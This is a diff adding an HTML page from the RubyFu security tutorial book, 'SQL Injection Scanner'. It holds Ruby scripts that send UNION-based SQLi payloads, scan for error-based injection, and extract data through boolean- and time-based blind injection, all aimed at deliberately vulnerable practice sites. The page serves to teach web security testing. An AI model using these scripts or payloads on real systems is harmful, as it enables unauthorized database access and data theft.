+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="sql-injection-scanner"><a name="sql-injection-scanner" class="plugin-anchor" href="#sql-injection-scanner"><span class="fa fa-link"></span></a>SQL Injection Scanner</h1>
1207
+ <h2 id="basic-sqli-script-as-command-line-browser"><a name="basic-sqli-script-as-command-line-browser" class="plugin-anchor" href="#basic-sqli-script-as-command-line-browser"><span class="fa fa-link"></span></a>Basic SQLi script as command line browser</h2>
1208
+ <p>The is a very basic script take your given payload and send it to the vulnerable parameter and returns the response back to you. I&apos;ll use (<a href="http://testphp.vulnweb.com/" target="_blank">http://testphp.vulnweb.com/</a>) as it&apos;s legal to test.</p>
1209
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1210
+ <span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
1211
+ <span class="hljs-comment"># Send your payload from command line</span>
1212
+ <span class="hljs-comment">#</span>
1213
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&quot;net/http&quot;</span>
1214
+
1215
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">2</span>
1216
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> [IP ADDRESS] [PAYLOAD]&quot;</span>
1217
+ exit <span class="hljs-number">0</span>
1218
+ <span class="hljs-keyword">else</span>
1219
+ host, payload = <span class="hljs-constant">ARGV</span>
1220
+ <span class="hljs-keyword">end</span>
1221
+
1222
+ uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/artists.php?&quot;</span>)
1223
+ uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">&quot;artist&quot;</span> =&gt; <span class="hljs-string">&quot;<span class="hljs-subst">#{payload}</span>&quot;</span>})
1224
+ http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
1225
+ http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">&apos;https&apos;</span> <span class="hljs-comment"># Enable HTTPS support if it&apos;s HTTPS</span>
1226
+ <span class="hljs-comment"># http.set_debug_output($stdout)</span>
1227
+
1228
+ request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
1229
+ response = http.request(request)
1230
+ <span class="hljs-comment"># puts &quot;[+] Status code: &quot;+ response.code + &quot;\n\n&quot;</span>
1231
+ <span class="hljs-comment"># puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</span>
1232
+ puts response.body.scan(<span class="hljs-regexp">/&lt;h2 id=&apos;pageName&apos;&gt;.*&lt;\/h2&gt;/</span>).join.gsub(<span class="hljs-regexp">/&lt;.*?&gt;/</span>, <span class="hljs-string">&apos;&apos;</span>).strip
1233
+
1234
+ puts <span class="hljs-string">&quot;&quot;</span>
1235
+ </code></pre>
1236
+ <blockquote>
1237
+ <p>I&apos;ve commented the line <code>puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</code> and added a custom regular expression to fix our target outputs.</p>
1238
+ </blockquote>
1239
+ <p>Let&apos;s to test it in action</p>
1240
+ <pre><code>ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL,NULL#&quot; | grep -i -e warning -e error
1241
+ # =&gt; Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
1242
+
1243
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL#&quot; | grep -i -e warning -e error
1244
+ # =&gt;
1245
+
1246
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,@@VERSION,NULL#&quot;
1247
+ # =&gt; artist: 5.1.73-0ubuntu0.10.04.1
1248
+
1249
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#&quot;
1250
+ # =&gt; artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
1251
+ </code></pre><p>Here a very basic and simple SQL-injection solid scanner, develop it as far as you can!</p>
1252
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1253
+ <span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
1254
+ <span class="hljs-comment"># Very basic SQLi scanner!</span>
1255
+ <span class="hljs-comment">#</span>
1256
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;net/http&apos;</span>
1257
+
1258
+ <span class="hljs-comment"># Some SQLi payloads</span>
1259
+ payloads =
1260
+ [
1261
+ <span class="hljs-string">&quot;&apos;&quot;</span>,
1262
+ <span class="hljs-string">&apos;&quot;&apos;</span>,
1263
+ <span class="hljs-string">&quot;&apos; or 1=2--+&quot;</span>
1264
+ ]
1265
+
1266
+ <span class="hljs-comment"># Some database error responses</span>
1267
+ errors =
1268
+ {
1269
+ <span class="hljs-symbol">:mysql</span> =&gt; [
1270
+ <span class="hljs-string">&quot;SQL.*syntax&quot;</span>,
1271
+ <span class="hljs-string">&quot;mysql.*(fetch).*array&quot;</span>,
1272
+ <span class="hljs-string">&quot;Warning&quot;</span>
1273
+ ],
1274
+ <span class="hljs-symbol">:mssql</span> =&gt; [
1275
+ <span class="hljs-string">&quot;line.*[0-9]&quot;</span>,
1276
+ <span class="hljs-string">&quot;Microsoft SQL Native Client error.*&quot;</span>
1277
+ ],
1278
+ <span class="hljs-symbol">:oracle</span> =&gt; [
1279
+ <span class="hljs-string">&quot;.*ORA-[0-9].*&quot;</span>,
1280
+ <span class="hljs-string">&quot;Warning&quot;</span>
1281
+ ]
1282
+ }
1283
+
1284
+ <span class="hljs-comment"># Try a known vulnerable site</span>
1285
+ uri = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">&quot;http://testphp.vulnweb.com/artists.php?artist=1&quot;</span>
1286
+
1287
+ <span class="hljs-comment"># Update the query with a payload</span>
1288
+ uri.query += payloads[<span class="hljs-number">0</span>]
1289
+
1290
+ <span class="hljs-comment"># Send get request</span>
1291
+ response = <span class="hljs-constant">Net::HTTP</span>.get uri
1292
+
1293
+ <span class="hljs-comment"># Search if an error occurred = vulnerable</span>
1294
+ puts <span class="hljs-string">&quot;[+] The <span class="hljs-subst">#{<span class="hljs-constant">URL</span>.decode(uri.to_s)}</span> is vulnerable!&quot;</span> <span class="hljs-keyword">unless</span> response.match(<span class="hljs-regexp">/<span class="hljs-subst">#{errors[<span class="hljs-symbol">:mysql</span>][<span class="hljs-number">0</span>]}</span>/i</span>).<span class="hljs-keyword">nil</span>?
1295
+ </code></pre>
1296
+ <p>Try it on this URL (<a href="http://testasp.vulnweb.com/showforum.asp?id=0" target="_blank">http://testasp.vulnweb.com/showforum.asp?id=0</a>)</p>
1297
+ <p>Results</p>
1298
+ <pre><code>ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
1299
+ [+] The http://testphp.vulnweb.com/artists.php?artist=1&apos; is vulnerable!
1300
+ </code></pre><h2 id="booleanbases-sqli-exploit-script"><a name="booleanbases-sqli-exploit-script" class="plugin-anchor" href="#booleanbases-sqli-exploit-script"><span class="fa fa-link"></span></a>Boolean-bases SQLi Exploit Script</h2>
1301
+ <p>Here is a Boolean-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
1302
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1303
+ <span class="hljs-comment"># Boolean-based SQLi exploit</span>
1304
+ <span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
1305
+ <span class="hljs-comment">#</span>
1306
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
1307
+
1308
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
1309
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
1310
+ exit <span class="hljs-number">0</span>
1311
+ <span class="hljs-keyword">else</span>
1312
+ host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
1313
+ <span class="hljs-keyword">end</span>
1314
+
1315
+ <span class="hljs-comment"># Just colorizing outputs</span>
1316
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
1317
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
1318
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
1319
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
1320
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span> &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
1321
+ <span class="hljs-keyword">end</span>
1322
+
1323
+ <span class="hljs-comment"># SQL injection</span>
1324
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_bbsqli</span><span class="hljs-params">(url, query)</span></span>
1325
+ <span class="hljs-keyword">begin</span>
1326
+
1327
+ response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
1328
+
1329
+ <span class="hljs-keyword">if</span> !response.read.scan(<span class="hljs-string">&quot;You are in...........&quot;</span>).empty?
1330
+ <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
1331
+ <span class="hljs-keyword">end</span>
1332
+
1333
+ <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
1334
+ puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red
1335
+ exit <span class="hljs-number">0</span>
1336
+ <span class="hljs-keyword">end</span>
1337
+ <span class="hljs-keyword">end</span>
1338
+
1339
+ url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-8/index.php?id=&quot;</span>
1340
+
1341
+ puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
1342
+
1343
+ extracted = []
1344
+ (<span class="hljs-number">1</span>..<span class="hljs-number">100</span>).map <span class="hljs-keyword">do</span> |position|
1345
+ (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
1346
+ puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
1347
+
1348
+ <span class="hljs-comment"># Put your query here </span>
1349
+ <span class="hljs-comment"># query = &quot;1&apos; AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+&quot;</span>
1350
+ query = <span class="hljs-string">&quot;1&apos; AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>--+&quot;</span>
1351
+ result = send_bbsqli(url, query)
1352
+ <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
1353
+ puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
1354
+
1355
+ extracted &lt;&lt; char.chr
1356
+ puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1357
+ <span class="hljs-keyword">break</span>
1358
+ <span class="hljs-keyword">end</span>
1359
+ <span class="hljs-keyword">end</span>
1360
+ <span class="hljs-keyword">end</span>
1361
+
1362
+ puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1363
+ </code></pre>
1364
+ <h2 id="timebases-sqli-exploit-script"><a name="timebases-sqli-exploit-script" class="plugin-anchor" href="#timebases-sqli-exploit-script"><span class="fa fa-link"></span></a>Time-bases SQLi Exploit Script</h2>
1365
+ <p>A Time-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
1366
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1367
+ <span class="hljs-comment"># Boolean-based SQLi exploit</span>
1368
+ <span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
1369
+ <span class="hljs-comment">#</span>
1370
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
1371
+
1372
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
1373
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
1374
+ exit <span class="hljs-number">0</span>
1375
+ <span class="hljs-keyword">else</span>
1376
+ host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
1377
+ <span class="hljs-keyword">end</span>
1378
+
1379
+ <span class="hljs-comment"># Just colorizing outputs</span>
1380
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
1381
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
1382
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
1383
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
1384
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span> &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
1385
+ <span class="hljs-keyword">end</span>
1386
+
1387
+ <span class="hljs-comment"># SQL injection</span>
1388
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_tbsqli</span><span class="hljs-params">(url, query, time2wait)</span></span>
1389
+ <span class="hljs-keyword">begin</span>
1390
+ start_time = <span class="hljs-constant">Time</span>.now
1391
+ response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
1392
+ end_time = <span class="hljs-constant">Time</span>.now
1393
+ howlong = end_time - start_time
1394
+
1395
+ <span class="hljs-keyword">if</span> howlong &gt;= time2wait
1396
+ <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
1397
+ <span class="hljs-keyword">end</span>
1398
+
1399
+ <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
1400
+ puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red
1401
+ exit <span class="hljs-number">0</span>
1402
+ <span class="hljs-keyword">end</span>
1403
+ <span class="hljs-keyword">end</span>
1404
+
1405
+ url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-10/index.php?id=&quot;</span>
1406
+
1407
+ puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
1408
+ time2wait = <span class="hljs-number">5</span>
1409
+ extracted = []
1410
+ (<span class="hljs-number">1</span>..<span class="hljs-number">76</span>).map <span class="hljs-keyword">do</span> |position|
1411
+ (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
1412
+ puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
1413
+
1414
+ <span class="hljs-comment"># Put your query here </span>
1415
+ query = <span class="hljs-string">&quot;1\&quot; AND IF((ASCII(SUBSTR((SELECT DATABASE()),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>, SLEEP(<span class="hljs-subst">#{time2wait}</span>), NULL)--+&quot;</span>
1416
+
1417
+ result = send_tbsqli(url, query, time2wait)
1418
+ <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
1419
+ puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
1420
+
1421
+ extracted &lt;&lt; char.chr
1422
+ puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1423
+ <span class="hljs-keyword">break</span>
1424
+ <span class="hljs-keyword">end</span>
1425
+ <span class="hljs-keyword">end</span>
1426
+ <span class="hljs-keyword">end</span>
1427
+
1428
+ puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1429
+ </code></pre>
1430
+
1431
+
1432
+ </section>
1433
+
1434
+
1435
+ </div>
1436
+ </div>
1437
+ </div>
1438
+
1439
+
1440
+ <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-prev " aria-label="Previous page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-left"></i></a>
1441
+
1442
+
1443
+ <a href="../module_0x4__web_kung_fu/databases.html" class="navigation navigation-next " aria-label="Next page: Databases"><i class="fa fa-angle-right"></i></a>
1444
+
1445
+ </div>
1446
+ </div>
1447
+
1448
+
1449
+ <script src="../gitbook/app.js"></script>
1450
+
1451
+
1452
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1453
+
1454
+
1455
+
1456
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1457
+
1458
+
1459
+
1460
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1461
+
1462
+
1463
+
1464
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1465
+
1466
+
1467
+
1468
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1469
+
1470
+
1471
+
1472
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1473
+
1474
+
1475
+
1476
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1477
+
1478
+
1479
+ <script>
1480
+ require(["gitbook"], function(gitbook) {
1481
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1482
+ gitbook.start(config);
1483
+ });
1484
+ </script>
1485
+
1486
+
1487
+ </body>
1488
+
1489
+ </html>